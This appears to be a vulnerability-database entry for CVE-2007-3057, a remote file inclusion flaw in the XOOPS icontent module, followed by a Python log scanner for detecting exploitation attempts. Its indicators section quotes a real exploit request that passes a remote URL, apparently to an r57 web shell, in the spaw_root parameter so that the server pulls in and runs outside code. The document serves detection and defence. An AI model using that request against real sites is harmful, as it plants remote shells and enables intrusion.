CVE-2007-3057
published 2007-06-06

Priority: P348
CVSS 2.0: 6.8 (medium), vector AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 68.67% (99.3th percentile)
PHP remote file inclusion vulnerability in include/wysiwyg/spaw_control.class.php in the icontent 4.5 module for XOOPS allows remote attackers to execute arbitrary PHP code via a URL in the spaw_root parameter. NOTE: this issue is probably a duplicate of CVE-2006-4656.

Affected

1 range
Vendor | Product | Version range | Fixed in
xoops | icontent_module | |

Detection & IOCs (extracted from sources)

path: /modules/icontent/include/wysiwyg/spaw_control.class.php
url: http://lppm.uns.ac.id/r57.txt?
filename: spaw_control.class.php
command: ?spaw_root=http://lppm.uns.ac.id/r57.txt?
  • Detect HTTP requests targeting the vulnerable file path with a remote URL supplied in the spaw_root parameter
  • Alert on GET/POST requests to /modules/icontent/include/wysiwyg/spaw_control.class.php containing 'spaw_root=' with an http:// or https:// value (remote file inclusion pattern)
  • This issue is noted as likely a duplicate of an earlier CVE; verify whether the same vulnerable file is already covered under CVE-2006-4656 to avoid duplicate alerting
  • The exploit targets both icontent v1.0 and v4.5; detection rules should cover both version paths if directory structures differ
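
The detection described in the bullets above, as an added example (not code from this page or from the XOOPS project): a Python scan of web access log lines for requests to spaw_control.class.php that carry an http:// or https:// value in spaw_root. The log lines, the host remote.example and the function names are constructed for illustration; access logs do not record POST bodies, so only query-string use is visible to this check.

```python
import re
from urllib.parse import parse_qsl, unquote

# File named in the advisory, matched as a path suffix so that differing
# module directory layouts (icontent v1.0 vs v4.5) are both covered.
VULN_SUFFIX = "/include/wysiwyg/spaw_control.class.php"
REMOTE = re.compile(r"^\s*https?://", re.IGNORECASE)
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def remote_spaw_root(target):
    """Return the remote URL passed as spaw_root to the vulnerable file, else None."""
    path, _, query = target.partition("?")
    # Decode the path, collapse repeated slashes and ignore case before matching.
    path = re.sub(r"/+", "/", unquote(path)).lower()
    if "icontent" not in path or not path.endswith(VULN_SUFFIX):
        return None
    # parse_qsl percent-decodes names and values once, as the server would.
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key == "spaw_root" and REMOTE.match(value):
            return value
    return None


def scan(lines):
    """Yield (line_number, method, remote_url) for each matching log line."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            hit = remote_spaw_root(match.group("target"))
            if hit:
                yield number, match.group("method"), hit


# Constructed sample lines in combined log format, not taken from real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Jun/2007:10:00:00 +0000] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://remote.example/a.txt? HTTP/1.1" 200 512',
    '192.0.2.11 - - [06/Jun/2007:10:00:05 +0000] "POST /xoops//modules/icontent/include/wysiwyg/spaw_control.class.php?foo=1&spaw_root=HTTP%3A%2F%2Fremote.example%2Fa.txt HTTP/1.0" 200 512',
    '192.0.2.12 - - [06/Jun/2007:10:00:09 +0000] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=../spaw/ HTTP/1.1" 200 512',
    '192.0.2.13 - - [06/Jun/2007:10:00:12 +0000] "GET /modules/icontent/index.php?spaw_root=http://remote.example/a.txt HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```
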